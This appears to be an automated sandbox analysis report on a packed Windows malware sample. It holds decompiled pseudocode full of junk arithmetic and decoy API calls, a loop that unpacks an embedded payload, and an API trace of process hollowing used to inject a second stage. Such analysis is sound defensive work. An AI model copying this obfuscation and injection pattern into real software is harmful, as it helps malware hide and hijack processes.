                          				_v144 = _v144 + 0x6fb1c642;
                          				_v108 = _v108 - 0x994df12;
                          				_v76 = _v76 - 0x7867e843;
                          				_v88 = _v88 + 0x45a20138;
                          				_v144 = _v144 - 0x4d6b8727;
                          				_v144 = _v144 + 0x42d16f3c;
                          				_v144 = _v144 - 0x4aaeb358;
                          				_v144 = _v144 - 0x5c1aa042;
                          				_v152 = _v152 + 0x49af1289;
                          				_v144 = _v144 + 0x437c985f;
                          				_v108 = _v108 + 0x79b9c2a2;
                          				_v56 = _v56 + 0x5b4a1592;
                          				_v88 = _v88 - 0x2ec83452;
                          				_v144 = _v144 + 0x437869a5;
                          				_v64 = _v64 + 0x3b025366;
                          				_v88 = _v88 - 0xd43d2d;
                          				_v76 = _v76 + 0x7d747d8a;
                          				_v104 = _v104 + 0x4883c890;
                          				_v152 = _v152 + 0x289bc367;
                          				_v76 = _v76 + 0x798c77cb;
                          				_v76 = _v76 - 0x56be1fbb;
                          				_v92 = _v92 + 0xdf5b30d;
                          				_v92 = _v92 + 0x37ed99c9;
                          				_v56 = _v56 - 0x7715dacd;
                          				_v88 = _v88 - 0x31376674;
                          				_v124 = _v124 - 0x636d4c79;
                          				_v76 = _v76 + 0x35025f94;
                          				_v76 = _v76 + 0x6e30b30b;
                          				_v64 = _v64 + 0x14dc745e;
                          				_v68 = _v68 - 0x169f63ef;
                          				_v76 = _v76 + 0x7c02df99;
                          				_v56 = _v56 - 0x2e59662f;
                          				_v92 = _v92 + 0x155c59a4;
                          				_v56 = _v56 + 0x7b75a504;
                          				_v112 = _v112 + 0x219f47f3;
                          				_v92 = _v92 - 0x67a552b;
                          				_v108 = _v108 + 0x4a2137a8;
                          				_v68 = _v68 + 0xc585413;
                          				_v88 = _v88 - 0x3a14e483;
                          				_v144 = _v144 + 0x5b524b4e;
                          				_v60 = _v60 + 0x34fb5402;
                          				_v92 = _v92 - 0x34bffa78;
                          				_v124 = _v124 + 0x6aa55f44;
                          				_v76 = _v76 + 0xf4e48f;
                          				_v104 = _v104 - 0x2cd6d396;
                          				_v88 = _v88 - 0x45adcf56;
                          				_v112 = _v112 + 0x46ab1204;
                          				_v112 = _v112 - 0x2d00c364;
                          				_v68 = _v68 + 0x7599e045;
                          				_v88 = _v88 + 0x74eabc8d;
                          				_v112 = _v112 + 0x7bf0b077;
                          				_v88 = _v88 + 0x5b716b01;
                          				_v104 = _v104 - 0x4d38819a;
                          				_v108 = _v108 + 0x278eda90;
                          				_v60 = _v60 + 0x1f444cf3;
                          				_v60 = _v60 + 0x1092cade;
                          				_v96 = _v96 + 0x3a66ef6d;
                          				_v88 = _v88 - 0x6fe2cb96;
                          				_v108 = _v108 - 0x173e588a;
                          				_v108 = _v108 + 0x27245b35;
                          				_v120 = _v120 + 0x441a636b;
                          				_v60 = _v60 + 0x5ba43329;
                          				_v164 = _v164 + 0x2901033c;
                          				_v128 = _v128 + 0x7b88cf48;
                          				_v76 = _v76 + 0x67a8963c;
                          				_v144 = _v144 - 0x7d8997bf;
                          				_v104 = _v104 - 0x626ab517;
                          				_v112 = _v112 + 0x36ad816d;
                          				_v88 = _v88 + 0x74cb5282;
                          				_v92 = _v92 - 0x7230715d;
                          				_v152 = _v152 - 0x597545ed;
                          				_v164 = _v164 - 0x3ec80e96;
                          				_v108 = _v108 - 0x7fd0260;
                          				_v140 = _v140 - 0x25000d89;
                          				_v164 = _v164 + 0x17d0d6ee;
                          				_v96 = _v96 - 0x538210b7;
                          				_v108 = _v108 - 0x233dd73b;
                          				_v100 = _v100 + 0x30220508;
                          				_v76 = _v76 - 0x1cee596;
                          				_v92 = _v92 - 0x2b0a7c88;
                          				_v128 = _v128 + 0x4ff17690;
                          				_v68 = _v68 - 0xaf71342;
                          				_v92 = _v92 + 0x7ef27e15;
                          				_v156 = _v156 + 0x47928b6b;
                          				_v108 = _v108 - 0x2c14997d;
                          				_v64 = _v64 + 0xa689404;
                          				_v156 = _v156 - 0xc7d2fed;
                          				_v60 = _v60 + 0x7d990335;
                          				_v156 = _v156 + 0x77640fe7;
                          				_v108 = _v108 + 0x76cee0ec;
                          				_v100 = _v100 - 0x8ece03b;
                          				_v56 = _v56 - 0x2b84348d;
                          				_v64 = _v64 - 0x64f9c0f;
                          				_v108 = _v108 - 0x8418f68;
                          				_v68 = _v68 - 0x3ab9c933;
                          				_v92 = _v92 + 0x32b4df14;
                          				_v60 = _v60 + 0x189e08f;
                          				_v60 = _v60 - 0x2cd1dbee;
                          				_v140 = _v140 + 0x7639de4a;
                          				_v144 = _v144 - 0x2f37c91f;
                          				_v116 = _v116 - 0x2bb22a2d;
                          				_v164 = _v164 + 0x6e49c677;
                          				_v160 = _v160 + 0x159d10e0;
                          				_v116 = _v116 + 0x3441d489;
                          				_v128 = _v128 - 0x83f7a80;
                          				_v108 = _v108 + 0x48b5e129;
                          				_v136 = _v136 + 0x56402792;
                          				_v124 = _v124 + 0xbc9365a;
                          				_v92 = _v92 + 0x421015e;
                          				_v168 = _v168 - 0x1e00592f;
                          				_v68 = _v68 - 0x15ce5b3f;
                          				_v68 = _v68 + 0x78fb057a;
                          				_v136 = _v136 - 0x67ec879;
                          				_v80 = _v80 - 0x1bf010b5;
                          				_v68 = _v68 - 0x6f1a8863;
                          				_v144 = _v144 - 0x2898aad2;
                          				_v84 = _v84 - 0x1e9953fd;
                          				_v116 = _v116 + 0x169c25d;
                          				_v96 = _v96 + 0x65ce6471;
                          				_v128 = _v128 + 0x4d7a962f;
                          				_v104 = _v104 - 0x21834542;
                          				_v96 = _v96 + 0x3832462b;
                          				_v72 = _v72 - 0x3743ab43;
                          				_v104 = _v104 + 0x3438b52a;
                          				_v160 = _v160 + 0x387092fa;
                          				_v64 = _v64 - 0x4cde04ab;
                          				_v148 = _v148 - 0x6a02c50f;
                          				_v96 = _v96 + 0x52975e55;
                          				_v160 = _v160 + 0x16ccda85;
                          				_v60 = _v60 - 0x721ba79a;
                          				_v152 = _v152 + 0x3cb8b521;
                          				_v148 = _v148 - 0x2772cc43;
                          				_v112 = _v112 + 0x83387bf;
                          				_v132 = _v132 + 0x530a5665;
                          				_t409 =  *0x4450c4 - 0x20;
                          				if( *0x4450c4 == 0x20) {
                          					WriteConsoleA(0, 0, 0,  &_v52, 0);
                          					__imp__IsProcessInJob(0, 0, 0);
                          					GetPriorityClass(0);
                          					_push("pumitafoto");
                          					_push(0);
                          					E00406707(_t387, _t395, _t397, 0, _t409);
                          					_pop(_t390);
                          					E00405FD6( &_v60, _t390);
                          					_push(0);
                          					_v20 = 0;
                          					E0040617D();
                          					E0040625A(_t387, _t397, 0);
                          					_push(0x38);
                          					_push(0);
                          					_push("%s %c");
                          					_push("msimg32.dll");
                          					E00406642(_t387, _t395, _t397, 0, _t409);
                          					E004065EF(_t387, 0, "0.txt", "rb");
                          					_t406 = _t405 + 0x1c;
                          					_push(0);
                          					E004064AE(_t387, _t397, 0, _t409);
                          					_push(0);
                          					_push(0);
                          					_push(0);
                          					E00406B33(_t387, _t395, _t397, 0, _t409);
                          					_pop(_t394);
                          					_t381 = _t406;
                          					 *_t381 = 0;
                          					 *((intOrPtr*)(_t381 + 4)) = 0;
                          					E00404B2A(__fp0);
                          					st0 = _t412;
                          					E0040694A(_t387, _t395, _t397, 0, _t409);
                          					_t384 = _t406;
                          					 *_t384 = 0;
                          					 *((intOrPtr*)(_t384 + 4)) = 0;
                          					E00404B07(_t412, _t394, 0);
                          					st0 = _t412;
                          					_v36 = _v36 | 0xffffffff;
                          					E00405FF3();
                          				}
                          				LoadLibraryA("kernel32.dll");
                          				_t365 =  *0x42e60c; // 0xfff618fd
                          				 *0x4450c4 = _t365;
                          				 *0x4450c8 =  *0x42d66c; // executed
                          				E00404EC6(); // executed
                          				 *[fs:0x0] = _v16;
                          				return 0;
                          			}




















































                          0x004058a1
                          0x004058a4
                          0x004058ad
                          0x004058af
                          0x004058b4
                          0x004058b5
                          0x004058bc
                          0x004058c4
                          0x004058cb
                          0x004058cb
                          0x004058d8
                          0x004058de
                          0x004058de
                          0x004058e1
                          0x004058e9
                          0x004058f1
                          0x004058f9
                          0x00405901
                          0x00405909
                          0x00405911
                          0x00405919
                          0x00405921
                          0x00405929
                          0x00405931
                          0x00405939
                          0x00405941
                          0x00405949
                          0x00405951
                          0x00405959
                          0x00405961
                          0x00405969
                          0x00405971
                          0x00405979
                          0x00405981
                          0x00405989
                          0x00405991
                          0x00405999
                          0x004059a1
                          0x004059a9
                          0x004059b1
                          0x004059b9
                          0x004059c1
                          0x004059c9
                          0x004059d1
                          0x004059d9
                          0x004059e1
                          0x004059e9
                          0x004059f1
                          0x004059f9
                          0x00405a01
                          0x00405a09
                          0x00405a11
                          0x00405a19
                          0x00405a21
                          0x00405a29
                          0x00405a31
                          0x00405a39
                          0x00405a41
                          0x00405a49
                          0x00405a51
                          0x00405a59
                          0x00405a61
                          0x00405a69
                          0x00405a71
                          0x00405a79
                          0x00405a81
                          0x00405a89
                          0x00405a91
                          0x00405a99
                          0x00405aa1
                          0x00405aa9
                          0x00405ab1
                          0x00405ab9
                          0x00405ac1
                          0x00405ac9
                          0x00405ad1
                          0x00405ad9
                          0x00405ae1
                          0x00405ae9
                          0x00405af1
                          0x00405af9
                          0x00405b01
                          0x00405b09
                          0x00405b11
                          0x00405b19
                          0x00405b21
                          0x00405b29
                          0x00405b31
                          0x00405b39
                          0x00405b41
                          0x00405b49
                          0x00405b51
                          0x00405b59
                          0x00405b61
                          0x00405b69
                          0x00405b71
                          0x00405b79
                          0x00405b81
                          0x00405b89
                          0x00405b91
                          0x00405b99
                          0x00405ba1
                          0x00405ba9
                          0x00405bb1
                          0x00405bb9
                          0x00405bc1
                          0x00405bc9
                          0x00405bd1
                          0x00405bd9
                          0x00405be1
                          0x00405be9
                          0x00405bf1
                          0x00405bf9
                          0x00405c01
                          0x00405c09
                          0x00405c11
                          0x00405c19
                          0x00405c21
                          0x00405c29
                          0x00405c31
                          0x00405c39
                          0x00405c41
                          0x00405c49
                          0x00405c51
                          0x00405c59
                          0x00405c61
                          0x00405c69
                          0x00405c71
                          0x00405c79
                          0x00405c81
                          0x00405c89
                          0x00405c91
                          0x00405c99
                          0x00405ca1
                          0x00405ca9
                          0x00405cb1
                          0x00405cb9
                          0x00405cc1
                          0x00405cc9
                          0x00405cd1
                          0x00405cd9
                          0x00405ce1
                          0x00405ce9
                          0x00405cf1
                          0x00405cf9
                          0x00405d01
                          0x00405d09
                          0x00405d11
                          0x00405d19
                          0x00405d21
                          0x00405d29
                          0x00405d31
                          0x00405d39
                          0x00405d41
                          0x00405d49
                          0x00405d51
                          0x00405d59
                          0x00405d61
                          0x00405d69
                          0x00405d71
                          0x00405d79
                          0x00405d81
                          0x00405d89
                          0x00405d91
                          0x00405d99
                          0x00405da1
                          0x00405da9
                          0x00405db1
                          0x00405db9
                          0x00405dc1
                          0x00405dc9
                          0x00405dd1
                          0x00405dd9
                          0x00405de1
                          0x00405de9
                          0x00405df1
                          0x00405df9
                          0x00405e01
                          0x00405e09
                          0x00405e11
                          0x00405e19
                          0x00405e21
                          0x00405e29
                          0x00405e31
                          0x00405e39
                          0x00405e41
                          0x00405e49
                          0x00405e51
                          0x00405e59
                          0x00405e61
                          0x00405e69
                          0x00405e71
                          0x00405e79
                          0x00405e81
                          0x00405e89
                          0x00405e91
                          0x00405e99
                          0x00405ea1
                          0x00405ea9
                          0x00405eb1
                          0x00405eb9
                          0x00405ec1
                          0x00405ec9
                          0x00405ed1
                          0x00405ed8
                          0x00405eea
                          0x00405ef3
                          0x00405efa
                          0x00405f00
                          0x00405f05
                          0x00405f06
                          0x00405f0c
                          0x00405f14
                          0x00405f19
                          0x00405f1a
                          0x00405f21
                          0x00405f28
                          0x00405f2e
                          0x00405f30
                          0x00405f31
                          0x00405f36
                          0x00405f3b
                          0x00405f4b
                          0x00405f50
                          0x00405f53
                          0x00405f54
                          0x00405f5a
                          0x00405f5b
                          0x00405f5c
                          0x00405f5d
                          0x00405f62
                          0x00405f63
                          0x00405f65
                          0x00405f67
                          0x00405f6a
                          0x00405f6f
                          0x00405f72
                          0x00405f78
                          0x00405f7a
                          0x00405f7c
                          0x00405f7f
                          0x00405f84
                          0x00405f86
                          0x00405f95
                          0x00405f95
                          0x00405f9f
                          0x00405fa5
                          0x00405faa
                          0x00405fb4
                          0x00405fb9
                          0x00405fc8
                          0x00405fd3

                          APIs
                          • GetLastError.KERNEL32 ref: 004058CB
                          • TransactNamedPipe.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004058D8
                          • WriteConsoleA.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405EEA
                          • IsProcessInJob.KERNEL32(00000000,00000000,00000000), ref: 00405EF3
                          • GetPriorityClass.KERNEL32(00000000), ref: 00405EFA
                          • _fprintf.LIBCMT ref: 00405F06
                            • Part of subcall function 0040617D: __lock.LIBCMT ref: 0040619B
                            • Part of subcall function 0040617D: ___sbh_find_block.LIBCMT ref: 004061A6
                            • Part of subcall function 0040617D: ___sbh_free_block.LIBCMT ref: 004061B5
                            • Part of subcall function 0040617D: HeapFree.KERNEL32(00000000,00000001,00416D00,0000000C,00407651,00000000,00416E70,0000000C,0040768B,00000001,?,?,004113F5,00000004,004171A8,0000000C), ref: 004061E5
                            • Part of subcall function 0040617D: GetLastError.KERNEL32(?,004113F5,00000004,004171A8,0000000C,0040D6D2,00000001,?,00000000,00000000,00000000,?,0040BD22,00000001,00000214), ref: 004061F6
                          • _malloc.LIBCMT ref: 00405F28
                            • Part of subcall function 0040625A: __FF_MSGBANNER.LIBCMT ref: 0040627D
                            • Part of subcall function 0040625A: __NMSG_WRITE.LIBCMT ref: 00406284
                            • Part of subcall function 0040625A: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,0040D688,00000001,00000001,00000001,?,004075FA,00000018,00416E70,0000000C,0040768B), ref: 004062D1
                          • _printf.LIBCMT ref: 00405F3B
                          • __wfopen_s.LIBCMT ref: 00405F4B
                            • Part of subcall function 004064AE: _flsall.LIBCMT ref: 004064C2
                          • _fseek.LIBCMT ref: 00405F5D
                            • Part of subcall function 00404B2A: __floor_pentium4.LIBCMT ref: 00404B3C
                          • _puts.LIBCMT ref: 00405F72
                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00405F9F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Similarity
                          • API ID: ErrorHeapLast$AllocateClassConsoleFreeLibraryLoadNamedPipePriorityProcessTransactWrite___sbh_find_block___sbh_free_block__floor_pentium4__lock__wfopen_s_flsall_fprintf_fseek_malloc_printf_puts
                          • String ID: %s %c$+F28$/Y$/fY.$0.txt$5[$'$Cgx$NKR[$]q0r$eVS$kernel32.dll$msimg32.dll$pumitafoto$tf71$yLmc$EuY
                          • API String ID: 1973602647-887915793
                          • Opcode ID: 310da69f1d45eb86b60e88712452ebc0e1e18f9478f8da6a3de34449216fee14
                          • Instruction ID: 50e6c1943cef447edd8285822ae666dec573e84210a2f4063047f0d204c6772e
                          • Opcode Fuzzy Hash: 310da69f1d45eb86b60e88712452ebc0e1e18f9478f8da6a3de34449216fee14
                          • Instruction Fuzzy Hash: C0F133B28097809FD3A08F66C58850FFBF0BFA57A4F244A0CF29516560E7758A84CF4B
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 008E0156
                          • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 008E016C
                          • CreateProcessA.KERNELBASE(?,00000000), ref: 008E0255
                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 008E0270
                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 008E0283
                          • GetThreadContext.KERNELBASE(00000000,?), ref: 008E029F
                          • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 008E02C8
                          • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 008E02E3
                          • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 008E0304
                          • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 008E032A
                          • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 008E0399
                          • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 008E03BF
                          • SetThreadContext.KERNELBASE(00000000,?), ref: 008E03E1
                          • ResumeThread.KERNELBASE(00000000), ref: 008E03ED
                          • ExitProcess.KERNEL32(00000000), ref: 008E0412
                          Memory Dump Source
                          • Source File: 00000000.00000002.248746882.00000000008E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_file.jbxd
                          Similarity
                          • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                          • String ID:
                          • API String ID: 2875986403-0
                          • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                          • Instruction ID: 109884960e1799c479e82f1449c412e94f693f959dad316c069fd378ee5d2253
                          • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                          • Instruction Fuzzy Hash: 05B1C874A00208AFDB44CF98C895F9EBBB5FF88314F248158E549AB395D771AD81CF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 62%
                          			E00404EC6() {
                          				void* _v6;
                          				short _v8;
                          				char _v12;
                          				long _v16;
                          				long _v20;
                          				char _v24;
                          				long _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				intOrPtr _v40;
                          				intOrPtr _v44;
                          				intOrPtr _v48;
                          				intOrPtr _v52;
                          				intOrPtr _v56;
                          				intOrPtr _v60;
                          				intOrPtr _v64;
                          				intOrPtr _v68;
                          				intOrPtr _v72;
                          				intOrPtr _v76;
                          				intOrPtr _v80;
                          				intOrPtr _v84;
                          				intOrPtr _v88;
                          				intOrPtr _v92;
                          				intOrPtr _v96;
                          				intOrPtr _v100;
                          				intOrPtr _v104;
                          				intOrPtr _v108;
                          				intOrPtr _v112;
                          				intOrPtr _v116;
                          				intOrPtr _v120;
                          				intOrPtr _v124;
                          				intOrPtr _v128;
                          				intOrPtr _v132;
                          				intOrPtr _v136;
                          				intOrPtr _v140;
                          				intOrPtr _v144;
                          				intOrPtr _v148;
                          				intOrPtr _v152;
                          				intOrPtr _v156;
                          				intOrPtr _v160;
                          				intOrPtr _v164;
                          				intOrPtr _v168;
                          				intOrPtr _v172;
                          				intOrPtr _v176;
                          				intOrPtr _v180;
                          				intOrPtr _v184;
                          				intOrPtr _v188;
                          				intOrPtr _v192;
                          				intOrPtr _v196;
                          				intOrPtr _v200;
                          				intOrPtr _v204;
                          				intOrPtr _v208;
                          				intOrPtr _v212;
                          				intOrPtr _v216;
                          				intOrPtr _v220;
                          				intOrPtr _v224;
                          				intOrPtr _v228;
                          				intOrPtr _v232;
                          				intOrPtr _v236;
                          				intOrPtr _v240;
                          				intOrPtr _v244;
                          				intOrPtr _v248;
                          				intOrPtr _v252;
                          				intOrPtr _v256;
                          				intOrPtr _v260;
                          				intOrPtr _v264;
                          				intOrPtr _v268;
                          				intOrPtr _v272;
                          				intOrPtr _v276;
                          				intOrPtr _v280;
                          				intOrPtr _v284;
                          				intOrPtr _v288;
                          				intOrPtr _v292;
                          				intOrPtr _v296;
                          				intOrPtr _v300;
                          				intOrPtr _v304;
                          				intOrPtr _v308;
                          				intOrPtr _v312;
                          				intOrPtr _v316;
                          				intOrPtr _v320;
                          				intOrPtr _v324;
                          				intOrPtr _v328;
                          				intOrPtr _v332;
                          				intOrPtr _v336;
                          				struct _cpinfo _v356;
                          				char _v420;
                          				void _v1444;
                          				char _v2468;
                          				char _v4516;
                          				void* _t514;
                          				void* _t660;
                          				void* _t661;
                          				void* _t698;
                          				void* _t699;
                          				void* _t700;
                          				void* _t701;
                          
                          				E0040E260(0x11a4);
                          				if( *0x4450c4 == 0x412) {
                          					E0040650A(0);
                          					_push(0);
                          					E00406520();
                          					_pop(_t660);
                          					E00406E58(0);
                          				}
                          				 *0x4450c4 =  *0x4450c4 + 0xb2d3b;
                          				 *0x444e94 = GetModuleHandleW(L"kernel32.dll"); // executed
                          				_t514 = LocalAlloc(0,  *0x4450c4); // executed
                          				 *0x444e90 = _t514; // executed
                          				E00404E1C(_t660); // executed
                          				_t698 = 0;
                          				if( *0x4450c4 > 0) {
                          					do {
                          						 *((char*)( *0x444e90 + _t698)) =  *((intOrPtr*)( *0x4450c8 + _t698 + 0xb2d3b));
                          						if( *0x4450c4 == 0x292) {
                          							__imp__CreateJobObjectA(0, "kowax");
                          						}
                          						_t698 = _t698 + 1;
                          					} while (_t698 <  *0x4450c4);
                          				}
                          				_t699 = 0;
                          				do {
                          					if( *0x4450c4 + _t699 == 0x5e) {
                          						SetFileAttributesA("pawujagobovalewobukalokaw", 0);
                          						GetProfileIntW(L"hiwapikijokutopesowayuzali", L"pudecebubafafelomulawogosu", 0);
                          						GetCPInfo(0,  &_v356);
                          						FoldStringA(0, 0, 0, 0, 0);
                          						GetVolumeInformationA(0,  &_v2468, 0,  &_v28,  &_v20,  &_v16,  &_v1444, 0);
                          						__imp__OpenJobObjectW(0, 0, L"ceyizevojapaxujekoxago");
                          						__imp__GetCalendarInfoW(0, 0, 0,  &_v4516, 0,  &_v24);
                          					}
                          					_t699 = _t699 + 1;
                          				} while (_t699 < 0x40c893);
                          				_t700 = 0;
                          				while(1) {
                          					GetLastError();
                          					if(_t700 < 0x1b92e5b) {
                          						_v132 = 0x67e462f3;
                          						_v124 = 0x5af06d69;
                          						_v16 = 0x550e6073;
                          						_v116 = 0x4b56b9f1;
                          						_v104 = 0x26994589;
                          						_v252 = 0x15985316;
                          						_v120 = 0x27020532;
                          						_v296 = 0x6b9abad0;
                          						_v108 = 0x3e73eb66;
                          						_v68 = 0x7117be28;
                          						_v276 = 0x5da604f3;
                          						_v244 = 0x5f7cd3d6;
                          						_v152 = 0x46721115;
                          						_v336 = 0x1a8f0345;
                          						_v280 = 0x50cc38f8;
                          						_v304 = 0x4a848631;
                          						_v188 = 0x12e177b5;
                          						_v236 = 0x1a4215b7;
                          						_v228 = 0x3b8c8b6a;
                          						_v96 = 0x701071da;
                          						_v220 = 0x4dde9e67;
                          						_v268 = 0x2138cdcc;
                          						_v100 = 0x79e12465;
                          						_v212 = 0x162df8c2;
                          						_v64 = 0x2e27f6b9;
                          						_v180 = 0x363c5601;
                          						_v172 = 0x53842e8a;
                          						_v224 = 0x43e591ec;
                          						_v60 = 0x5eebb39e;
                          						_v52 = 0x72b95c38;
                          						_v48 = 0x2de3b1b4;
                          						_v112 = 0x190b9d4e;
                          						_v92 = 0xfe4109f;
                          						_v184 = 0x54ae7bc5;
                          						_v204 = 0x1411b51d;
                          						_v272 = 0x68c2a4e4;
                          						_v32 = 0x25db7a5;
                          						_v200 = 0x6df25c1e;
                          						_v88 = 0x58a91d;
                          						_v40 = 0x23420a38;
                          						_v144 = 0x749db312;
                          						_v288 = 0x73b9f5d5;
                          						_v260 = 0x78838e04;
                          						_v312 = 0x789f54e0;
                          						_v80 = 0x5f80cd7c;
                          						_v176 = 0x723d872f;
                          						_v84 = 0x1c20b523;
                          						_v20 = 0x39933e29;
                          						_v76 = 0x6a6cdf36;
                          						_v248 = 0x2f4182c9;
                          						_v216 = 0x6ad8ef0c;
                          						_v148 = 0x3a6c434;
                          						_v164 = 0x11c906fe;
                          						_v264 = 0x402d3c3a;
                          						_v136 = 0x52ee4d1b;
                          						_v8 = 0x347c6d6c;
                          						_v208 = 0x11b0372a;
                          						_v44 = 0x2fbc9c79;
                          						_v196 = 0x583c1114;
                          						_v332 = 0x17263a72;
                          						_v36 = 0xce8ec49;
                          						_v328 = 0x205defbb;
                          						_v12 = 0x31df762c;
                          						_v56 = 0x448f7225;
                          						_v324 = 0x3063220d;
                          						_v232 = 0x2f8d2ea5;
                          						_v128 = 0x123be14;
                          						_v28 = 0x551450a8;
                          						_v316 = 0x22150baf;
                          						_v140 = 0x5cf25b83;
                          						_v160 = 0x6950ea8;
                          						_v24 = 0x63c398fe;
                          						_v72 = 0x57b6e36;
                          						_v256 = 0x688827b4;
                          						_v308 = 0x70571416;
                          						_v192 = 0x60f034a3;
                          						_v168 = 0x7d50f5eb;
                          						_v320 = 0x78cd8b6f;
                          						_v240 = 0x1fd366fc;
                          						_v300 = 0x530f435e;
                          						_v292 = 0x28187254;
                          						_v156 = 0x360de2c2;
                          						_v284 = 0x25b3a818;
                          						_v132 = _v132 + 0x5caa67d5;
                          						_v124 = _v124 + 0x3b4ed235;
                          						_v132 = _v132 + 0x9e62a32;
                          						_v116 = _v116 - 0x8187383;
                          						_v132 = _v132 + 0x4c135ce0;
                          						_v16 = _v16 - 0x57444216;
                          						_v252 = _v252 + 0x43039132;
                          						_v252 = _v252 - 0x4703250d;
                          						_v120 = _v120 - 0x17f9cbea;
                          						_v252 = _v252 - 0x5cb4ba90;
                          						_v132 = _v132 - 0x559ddfdf;
                          						_v252 = _v252 - 0x15219df6;
                          						_v252 = _v252 + 0x2ee0da94;
                          						_v124 = _v124 + 0x179c7ebc;
                          						_v252 = _v252 - 0x6ee50c3d;
                          						_v252 = _v252 + 0x736fd115;
                          						_v108 = _v108 + 0x58ac6b3;
                          						_v124 = _v124 - 0x2461dbba;
                          						_v124 = _v124 + 0x53166a3;
                          						_v296 = _v296 + 0x6067d7d6;
                          						_v108 = _v108 - 0x3a59ed01;
                          						_v116 = _v116 + 0x502aa82c;
                          						_v68 = _v68 + 0x40c398db;
                          						_v68 = _v68 + 0x5316f79;
                          						_v276 = _v276 + 0x5e5e1713;
                          						_v336 = _v336 - 0x5012eb95;
                          						_v276 = _v276 - 0x300a3d27;
                          						_v212 = _v212 - 0x40f1be80;
                          						_v100 = _v100 + 0x51907ee;
                          						_v16 = _v16 + 0x53bf2d2;
                          						_v252 = _v252 + 0x62a7deba;
                          						_v236 = _v236 - 0x15a282bd;
                          						_v124 = _v124 + 0x750cf09;
                          						_v268 = _v268 + 0x265a1b03;
                          						_v180 = _v180 - 0x7c55df99;
                          						_v244 = _v244 + 0x5c3f5cea;
                          						_v224 = _v224 + 0x5002a5aa;
                          						_v204 = _v204 - 0x452fd972;
                          						_v100 = _v100 + 0x5a859301;
                          						_v236 = _v236 + 0x5b406f7a;
                          						_v336 = _v336 - 0x554aef4c;
                          						_v68 = _v68 - 0x3a465d9d;
                          						_v296 = _v296 - 0x56a948ad;
                          						_v116 = _v116 + 0x76502a4c;
                          						_v280 = _v280 + 0x1c3c6481;
                          						_v224 = _v224 - 0x31062905;
                          						_v304 = _v304 - 0x19570b2c;
                          						_v112 = _v112 + 0x3720702c;
                          						_v16 = _v16 - 0x324c8da1;
                          						_v108 = _v108 + 0x37f2284d;
                          						_v296 = _v296 + 0x5e4b11c3;
                          						_v172 = _v172 - 0x72ffab49;
                          						_v204 = _v204 + 0x2b31abb;
                          						_v188 = _v188 + 0x3ab7a116;
                          						_v204 = _v204 + 0x45825cdf;
                          						_v52 = _v52 + 0x3949c1ed;
                          						_v244 = _v244 + 0x4b811fea;
                          						_v32 = _v32 - 0x4f9a4dab;
                          						_v84 = _v84 + 0x749ceff;
                          						_v204 = _v204 + 0x10bffb89;
                          						_v108 = _v108 - 0x2b0f6f5f;
                          						_v236 = _v236 + 0x3365b823;
                          						_v212 = _v212 - 0x42ff9f92;
                          						_v244 = _v244 + 0x32a1e7fb;
                          						_v76 = _v76 + 0x2058b3c;
                          						_v172 = _v172 + 0x988af5a;
                          						_v144 = _v144 + 0x196202ca;
                          						_v184 = _v184 - 0x7f832484;
                          						_v268 = _v268 - 0x12652de7;
                          						_v20 = _v20 - 0xeafcb8e;
                          						_v136 = _v136 - 0x141cfa96;
                          						_v296 = _v296 + 0x1d7db3b5;
                          						_v60 = _v60 - 0x63ba0c91;
                          						_v88 = _v88 - 0x1ee4938d;
                          						_v80 = _v80 + 0x7743f0d1;
                          						_v276 = _v276 - 0xac60d68;
                          						_v272 = _v272 - 0x1ce466d9;
                          						_v252 = _v252 - 0x400cde42;
                          						_v56 = _v56 + 0x7acaa60e;
                          						_v80 = _v80 - 0x6466e154;
                          						_v136 = _v136 - 0x3d665518;
                          						_v72 = _v72 - 0x2c800c08;
                          						_v68 = _v68 - 0x64c489e9;
                          					}
                          					GetSystemDefaultLCID();
                          					if(_t700 > 0x1b3afd6) {
                          						break;
                          					}
                          					_t700 = _t700 + 1;
                          					if(_t700 < 0x16bae1c0) {
                          						continue;
                          					}
                          					break;
                          				}
                          				E00404D37();
                          				_t661 = 0;
                          				do {
                          					if(_t661 == 0x770e) {
                          						E00404E02(_t661);
                          					}
